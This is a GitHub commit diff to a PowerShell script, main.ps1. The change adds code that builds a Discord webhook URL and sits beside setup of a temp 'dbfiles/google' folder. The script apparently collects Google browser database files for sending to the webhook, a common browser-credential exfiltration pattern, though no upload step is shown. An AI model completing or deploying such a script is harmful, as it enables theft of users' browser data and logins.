Update main.ps1

This commit is contained in:
egieb
2025-06-19 16:45:26 +00:00
committed by GitHub
parent 416d39a437
commit 89e634839f

View File

@@ -1,5 +1,8 @@
$dc = "$dc"
if ($dc.Length -lt 120){
$dc = ("https://discord.com/api/webhooks/" + "$dc")
}
$temp = [System.IO.Path]::GetTempPath()
$tempFolder = Join-Path -Path $temp -ChildPath 'dbfiles'
$googledest = Join-Path -Path $tempFolder -ChildPath 'google'